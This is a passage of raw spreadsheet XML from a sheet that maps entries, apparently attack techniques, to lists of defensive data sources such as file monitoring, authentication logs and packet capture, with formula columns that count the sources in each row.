        <f>LOOKUP(A372,'REF-DataSources'!A:C)</f>
        <v>File monitoring,DLL monitoring</v>
      </c>
      <c r="D372" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E372" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="373" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A373" s="53" t="s">
        <v>2216</v>
      </c>
      <c r="B373" s="53" t="str">
        <f>LOOKUP(A373,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring</v>
      </c>
      <c r="D373" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E373" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="374" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A374" s="55" t="s">
        <v>2221</v>
      </c>
      <c r="B374" s="53" t="str">
        <f>LOOKUP(A374,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C374" s="17">
        <v>100</v>
      </c>
      <c r="D374" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E374" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="375" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A375" s="53" t="s">
        <v>2225</v>
      </c>
      <c r="B375" s="53" t="str">
        <f>LOOKUP(A375,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D375" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E375" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="376" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A376" s="53" t="s">
        <v>2231</v>
      </c>
      <c r="B376" s="53" t="str">
        <f>LOOKUP(A376,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Windows Registry,Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="D376" s="53">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E376" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="377" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A377" s="53" t="s">
        <v>2236</v>
      </c>
      <c r="B377" s="53" t="str">
        <f>LOOKUP(A377,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="D377" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E377" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="378" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A378" s="53" t="s">
        <v>2240</v>
      </c>
      <c r="B378" s="53" t="str">
        <f>LOOKUP(A378,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Authentication logs</v>
      </c>
      <c r="D378" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E378" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="379" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A379" s="53" t="s">
        <v>2245</v>
      </c>
      <c r="B379" s="53" t="str">
        <f>LOOKUP(A379,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="D379" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E379" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="380" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A380" s="53" t="s">
        <v>2249</v>
      </c>
      <c r="B380" s="53" t="str">
        <f>LOOKUP(A380,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="D380" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E380" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="381" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A381" s="53" t="s">
        <v>2253</v>
      </c>
      <c r="B381" s="53" t="str">
        <f>LOOKUP(A381,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="D381" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E381" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="382" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A382" s="53" t="s">
        <v>2257</v>
      </c>
      <c r="B382" s="53" t="str">
        <f>LOOKUP(A382,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Authentication logs</v>
      </c>
      <c r="D382" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E382" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="383" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A383" s="53" t="s">
        <v>2261</v>
      </c>
      <c r="B383" s="53" t="str">
        <f>LOOKUP(A383,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,DLL monitoring,File monitoring</v>
      </c>
      <c r="D383" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E383" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="384" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A384" s="53" t="s">
        <v>2266</v>
      </c>
      <c r="B384" s="53" t="str">
        <f>LOOKUP(A384,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,DLL monitoring</v>
      </c>
      <c r="D384" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E384" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="385" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A385" s="53" t="s">
        <v>2271</v>
      </c>
      <c r="B385" s="53" t="str">
        <f>LOOKUP(A385,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,DLL monitoring,File monitoring</v>
      </c>
      <c r="D385" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E385" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="386" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A386" s="53" t="s">
        <v>2275</v>
      </c>
      <c r="B386" s="53" t="str">
        <f>LOOKUP(A386,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,File monitoring,Binary file metadata</v>
      </c>
      <c r="D386" s="53">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E386" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="387" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A387" s="53" t="s">
        <v>2280</v>
      </c>
      <c r="B387" s="53" t="str">
        <f>LOOKUP(A387,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,File monitoring,Binary file metadata</v>
      </c>
      <c r="D387" s="53">
        <f t="shared" ref="D387:D450" si="13">LEN(TRIM(B387))-LEN(SUBSTITUTE(TRIM(B387),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E387" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="388" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A388" s="53" t="s">
        <v>2284</v>
      </c>
      <c r="B388" s="53" t="str">
        <f>LOOKUP(A388,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D388" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E388" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="389" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A389" s="55" t="s">
        <v>2288</v>
      </c>
      <c r="B389" s="53" t="str">
        <f>LOOKUP(A389,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C389" s="17">
        <v>0</v>
      </c>
      <c r="D389" s="53">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="E389" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="390" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A390" s="53" t="s">
        <v>2292</v>
      </c>
      <c r="B390" s="53" t="str">
        <f>LOOKUP(A390,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D390" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E390" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="391" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A391" s="53" t="s">
        <v>2297</v>
      </c>
      <c r="B391" s="53" t="str">
        <f>LOOKUP(A391,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D391" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E391" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="392" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A392" s="53" t="s">
        <v>2301</v>
      </c>
      <c r="B392" s="53" t="str">
        <f>LOOKUP(A392,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D392" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E392" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="393" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A393" s="53" t="s">
        <v>2305</v>
      </c>
      <c r="B393" s="53" t="str">
        <f>LOOKUP(A393,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Azure activity logs,AWS CloudTrail logs,Anti-virus,Services,API monitoring,Environment variable,Authentication logs,File monitoring,Process command-line parameters,Process monitoring,Windows Registry</v>
      </c>
      <c r="D393" s="53">
        <f t="shared" si="13"/>
        <v>12</v>
      </c>
      <c r="E393" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="394" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A394" s="53" t="s">
        <v>2311</v>
      </c>
      <c r="B394" s="53" t="str">
        <f>LOOKUP(A394,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Windows Registry,Services,File monitoring</v>
      </c>
      <c r="D394" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E394" s="53">
        <f t="shared" ref="E394:E457" si="14">LEN(TRIM(C394))-LEN(SUBSTITUTE(TRIM(C394),";",""))+1</f>
        <v>1</v>
      </c>
    </row>
    <row r="395" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A395" s="53" t="s">
        <v>2317</v>
      </c>
      <c r="B395" s="53" t="str">
        <f>LOOKUP(A395,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows event logs,Process command-line parameters</v>
      </c>
      <c r="D395" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E395" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="396" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A396" s="53" t="s">
        <v>2322</v>
      </c>
      <c r="B396" s="53" t="str">
        <f>LOOKUP(A396,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,Process command-line parameters,Environment variable,File monitoring,Authentication logs,Process monitoring</v>
      </c>
      <c r="D396" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E396" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="397" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A397" s="53" t="s">
        <v>2327</v>
      </c>
      <c r="B397" s="53" t="str">
        <f>LOOKUP(A397,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Windows Registry</v>
      </c>
      <c r="D397" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E397" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="398" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A398" s="53" t="s">
        <v>2332</v>
      </c>
      <c r="B398" s="53" t="str">
        <f>LOOKUP(A398,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Sensor health and status</v>
      </c>
      <c r="D398" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E398" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="399" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A399" s="53" t="s">
        <v>2338</v>
      </c>
      <c r="B399" s="53" t="str">
        <f>LOOKUP(A399,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D399" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E399" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="400" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A400" s="53" t="s">
        <v>2343</v>
      </c>
      <c r="B400" s="53" t="str">
        <f>LOOKUP(A400,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Azure activity logs,GCP audit logs</v>
      </c>
      <c r="D400" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E400" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="401" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A401" s="53" t="s">
        <v>2348</v>
      </c>
      <c r="B401" s="53" t="str">
        <f>LOOKUP(A401,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs</v>
      </c>
      <c r="D401" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E401" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="402" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A402" s="55" t="s">
        <v>2353</v>
      </c>
      <c r="B402" s="53" t="str">
        <f>LOOKUP(A402,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C402" s="17">
        <v>100</v>
      </c>
      <c r="D402" s="53">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="E402" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="403" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A403" s="53" t="s">
        <v>2357</v>
      </c>
      <c r="B403" s="53" t="str">
        <f>LOOKUP(A403,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,Authentication logs</v>
      </c>
      <c r="D403" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E403" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="404" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A404" s="53" t="s">
        <v>2361</v>
      </c>
      <c r="B404" s="53" t="str">
        <f>LOOKUP(A404,'REF-DataSources'!A:C)</f>
        <v>API monitoring,PowerShell logs,Authentication logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D404" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E404" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="405" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A405" s="53" t="s">
        <v>2366</v>
      </c>
      <c r="B405" s="53" t="str">
        <f>LOOKUP(A405,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D405" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E405" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="406" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A406" s="53" t="s">
        <v>2370</v>
      </c>
      <c r="B406" s="53" t="str">
        <f>LOOKUP(A406,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Authentication logs</v>
      </c>
      <c r="D406" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E406" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="407" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A407" s="53" t="s">
        <v>2375</v>
      </c>
      <c r="B407" s="53" t="str">
        <f>LOOKUP(A407,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,PowerShell logs</v>
      </c>
      <c r="D407" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E407" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="408" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A408" s="53" t="s">
        <v>2380</v>
      </c>
      <c r="B408" s="53" t="str">
        <f>LOOKUP(A408,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,API monitoring,File monitoring</v>
      </c>
      <c r="D408" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E408" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="409" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A409" s="53" t="s">
        <v>2386</v>
      </c>
      <c r="B409" s="53" t="str">
        <f>LOOKUP(A409,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Windows Registry</v>
      </c>
      <c r="D409" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E409" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="410" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A410" s="53" t="s">
        <v>2391</v>
      </c>
      <c r="B410" s="53" t="str">
        <f>LOOKUP(A410,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Host network interface,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D410" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E410" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="411" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A411" s="55" t="s">
        <v>2396</v>
      </c>
      <c r="B411" s="53" t="str">
        <f>LOOKUP(A411,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C411" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D411" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E411" s="53">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="412" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A412" s="53" t="s">
        <v>2400</v>
      </c>
      <c r="B412" s="53" t="str">
        <f>LOOKUP(A412,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network protocol analysis,File monitoring,Application logs</v>
      </c>
      <c r="D412" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E412" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="413" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A413" s="53" t="s">
        <v>2405</v>
      </c>
      <c r="B413" s="53" t="str">
        <f>LOOKUP(A413,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Application logs</v>
      </c>
      <c r="D413" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E413" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="414" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A414" s="53" t="s">
        <v>2410</v>
      </c>
      <c r="B414" s="53" t="str">
        <f>LOOKUP(A414,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network protocol analysis</v>
      </c>
      <c r="D414" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E414" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="415" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A415" s="55" t="s">
        <v>2415</v>
      </c>
      <c r="B415" s="53" t="str">
        <f>LOOKUP(A415,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C415" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D415" s="53">
        <f t="shared" si="13"/>
        <v>2</v>
      </c>
      <c r="E415" s="53">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="416" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A416" s="53" t="s">
        <v>2419</v>
      </c>
      <c r="B416" s="53" t="str">
        <f>LOOKUP(A416,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Web proxy,Email gateway,Mail server,Network intrusion detection system,Detonation chamber,SSL/TLS inspection,Anti-virus</v>
      </c>
      <c r="D416" s="53">
        <f t="shared" si="13"/>
        <v>9</v>
      </c>
      <c r="E416" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="417" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A417" s="53" t="s">
        <v>2425</v>
      </c>
      <c r="B417" s="53" t="str">
        <f>LOOKUP(A417,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</v>
      </c>
      <c r="D417" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E417" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="418" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A418" s="53" t="s">
        <v>2430</v>
      </c>
      <c r="B418" s="53" t="str">
        <f>LOOKUP(A418,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</v>
      </c>
      <c r="D418" s="53">
        <f t="shared" si="13"/>
        <v>7</v>
      </c>
      <c r="E418" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="419" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A419" s="53" t="s">
        <v>2435</v>
      </c>
      <c r="B419" s="53" t="str">
        <f>LOOKUP(A419,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Anti-virus,Web proxy</v>
      </c>
      <c r="D419" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E419" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="420" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A420" s="53" t="s">
        <v>2440</v>
      </c>
      <c r="B420" s="53" t="str">
        <f>LOOKUP(A420,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="D420" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E420" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="421" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A421" s="53" t="s">
        <v>2445</v>
      </c>
      <c r="B421" s="53" t="str">
        <f>LOOKUP(A421,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="D421" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E421" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="422" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A422" s="53" t="s">
        <v>2449</v>
      </c>
      <c r="B422" s="53" t="str">
        <f>LOOKUP(A422,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="D422" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E422" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="423" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A423" s="53" t="s">
        <v>2453</v>
      </c>
      <c r="B423" s="53" t="str">
        <f>LOOKUP(A423,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,DNS records</v>
      </c>
      <c r="D423" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E423" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="424" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A424" s="55" t="s">
        <v>2458</v>
      </c>
      <c r="B424" s="53" t="str">
        <f>LOOKUP(A424,'REF-DataSources'!A:C)</f>
        <v>DNS records</v>
      </c>
      <c r="C424" s="17">
        <v>100</v>
      </c>
      <c r="D424" s="53">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="E424" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="425" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A425" s="53" t="s">
        <v>2463</v>
      </c>
      <c r="B425" s="53" t="str">
        <f>LOOKUP(A425,'REF-DataSources'!A:C)</f>
        <v>DNS records,Netflow/Enclave netflow,Network device logs,Packet capture,Process use of network</v>
      </c>
      <c r="D425" s="53">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="E425" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="426" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A426" s="55" t="s">
        <v>2468</v>
      </c>
      <c r="B426" s="53" t="str">
        <f>LOOKUP(A426,'REF-DataSources'!A:C)</f>
        <v>DNS records</v>
      </c>
      <c r="C426" s="17">
        <v>100</v>
      </c>
      <c r="D426" s="53">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="E426" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="427" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A427" s="53" t="s">
        <v>2472</v>
      </c>
      <c r="B427" s="53" t="str">
        <f>LOOKUP(A427,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D427" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E427" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="428" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A428" s="53" t="s">
        <v>2477</v>
      </c>
      <c r="B428" s="53" t="str">
        <f>LOOKUP(A428,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D428" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E428" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="429" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A429" s="53" t="s">
        <v>2481</v>
      </c>
      <c r="B429" s="53" t="str">
        <f>LOOKUP(A429,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D429" s="53">
        <f t="shared" si="13"/>
        <v>3</v>
      </c>
      <c r="E429" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="430" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A430" s="53" t="s">
        <v>2485</v>
      </c>
      <c r="B430" s="53" t="str">
        <f>LOOKUP(A430,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="D430" s="53">
        <f t="shared" si="13"/>
        <v>7</v>
      </c>
      <c r="E430" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="431" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A431" s="53" t="s">
        <v>2489</v>
      </c>
      <c r="B431" s="53" t="str">
        <f>LOOKUP(A431,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D431" s="53">
        <f t="shared" si="13"/>
        <v>4</v>
      </c>
      <c r="E431" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="432" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A432" s="53" t="s">
        <v>2494</v>
      </c>
      <c r="B432" s="53" t="str">
        <f>LOOKUP(A432,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D432" s="53">
        <f t="shared" si="13"/>
        <v>5</v>
      </c>
      <c r="E432" s="53">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="433" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A433" s="53" t="s">
        <v>2498</v>
      </c>
      <c r="B433" s="53" t="str">
        <f>LOOKUP(A433,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="D433" s="53">
        <f t="shared" si="13"/>
        <v>6</v>
      </c>
      <c r="E433" s="53">
